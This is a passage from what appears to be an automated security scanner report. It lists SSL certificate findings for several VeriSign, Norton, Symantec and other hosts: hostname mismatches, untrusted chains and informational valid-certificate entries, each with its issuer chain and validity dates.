Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

8.4. https://knowledge.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	knowledge.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Feb 02 18:00:00 GMT-06:00 2010
Valid to:	Mon Feb 20 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

8.5. https://onlinefamily.norton.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://onlinefamily.norton.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	www.onlinefamily.norton.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Tue Oct 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Oct 06 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:	Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.6. https://query.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://query.verisign.com
Path:	/

Issue detail

The following problems were identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.
The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	query-ncsa.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Feb 13 18:00:00 GMT-06:00 2011
Valid to:	Tue Mar 05 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

8.7. https://ssl-certificate-center.verisign.ch/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-emea.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.8. https://ssl-certificate-center.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-ncsa.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.9. https://trust-center.verisign.ch/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-emea.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.10. https://trust-center.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-ncsa.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.11. https://us.norton.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://us.norton.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	www.norton.com
Issued by:	USERTrust Legacy Secure Server CA
Valid from:	Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:	Sat May 19 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	USERTrust Legacy Secure Server CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Thu Nov 26 14:33:13 GMT-06:00 2009
Valid to:	Sat Oct 31 22:00:00 GMT-06:00 2015

Certificate chain #2

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

8.12. https://admin.instantservice.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.instantservice.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.instantservice.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Wed Jul 06 18:00:00 GMT-06:00 2011
Valid to:	Fri Jul 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.13. https://buy-static.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://buy-static.norton.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	buy-static.norton.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 11 18:00:00 GMT-06:00 2011
Valid to:	Sat Jul 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.14. https://cdn.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	cdn.verisign.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Sun Apr 18 18:00:00 GMT-06:00 2010
Valid to:	Fri Apr 18 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:	Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.15. https://cert.webtrust.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	cert.webtrust.org
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Wed Oct 21 18:00:00 GMT-06:00 2009
Valid to:	Sun Oct 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:	Mon Oct 24 17:59:59 GMT-06:00 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.16. https://donate.mozilla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	donate.mozilla.org
Issued by:	UTN-USERFirst-Hardware
Valid from:	Mon Sep 20 18:00:00 GMT-06:00 2010
Valid to:	Wed Sep 21 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:	Tue Jul 09 12:19:22 GMT-06:00 2019

8.17. https://drh.img.digitalriver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://drh.img.digitalriver.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.img.digitalriver.com,ST=Minnesota
Issued by:	Akamai Subordinate CA 3
Valid from:	Thu Feb 03 08:22:35 GMT-06:00 2011
Valid to:	Fri Feb 03 08:22:35 GMT-06:00 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 09:32:00 GMT-06:00 2006
Valid to:	Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

8.18. https://enterprise-ssl-admin.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprise-ssl-admin.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	enterprise-ssl-admin.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Thu Oct 22 18:00:00 GMT-06:00 2009
Valid to:	Thu Oct 13 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.19. https://idprotect.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	idprotect.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Wed Mar 24 18:00:00 GMT-06:00 2010
Valid to:	Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.20. https://partnernet.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://partnernet.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	partnernet.symantec.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Dec 16 18:00:00 GMT-06:00 2010
Valid to:	Sun Jan 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.21. https://policy3.responsys.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://policy3.responsys.net
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.responsys.net
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sun May 16 05:02:14 GMT-06:00 2010
Valid to:	Sun Jun 17 14:48:31 GMT-06:00 2012

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

8.22. https://press.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://press.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	press.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Mar 02 18:00:00 GMT-06:00 2010
Valid to:	Fri Mar 02 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.23. https://products.geotrust.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.geotrust.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	products.geotrust.com
Issued by:	GeoTrust Extended Validation SSL CA
Valid from:	Sat Apr 16 15:58:45 GMT-06:00 2011
Valid to:	Sat May 18 12:50:47 GMT-06:00 2013

Certificate chain #1

Issued to:	GeoTrust Extended Validation SSL CA
Issued by:	GeoTrust Primary Certification Authority
Valid from:	Tue Nov 28 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 28 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	GeoTrust Primary Certification Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Tue Nov 28 10:08:31 GMT-06:00 2006
Valid to:	Tue Aug 21 09:08:31 GMT-06:00 2018

Certificate chain #3

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

Certificate chain #4

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

8.24. https://products.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	products.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Wed Nov 18 18:00:00 GMT-06:00 2009
Valid to:	Wed Nov 30 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.25. https://renewals.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	renewals.symantec.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Apr 25 18:00:00 GMT-06:00 2011
Valid to:	Wed Apr 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.26. https://seal.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://seal.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	seal.verisign.com
Issued by:	VeriSign Class 3 Secure Server CA - G2
Valid from:	Tue Jul 06 18:00:00 GMT-06:00 2010
Valid to:	Sun Jul 06 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G2
Issued by:	VeriSign Trust Network
Valid from:	Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:	Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 18:00:00 GMT-06:00 1998
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #3

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 18:00:00 GMT-06:00 1998
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

8.27. https://securitycenter.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	SECURITYCENTER.VERISIGN.COM
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Dec 27 18:00:00 GMT-06:00 2010
Valid to:	Thu Dec 27 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.28. https://symaccount.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://symaccount.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	symaccount.symantec.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Feb 10 18:00:00 GMT-06:00 2011
Valid to:	Thu Mar 01 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.29. https://symantec-corporation.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://symantec-corporation.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	symantec-corporation.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon May 16 18:00:00 GMT-06:00 2011
Valid to:	Wed May 16 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
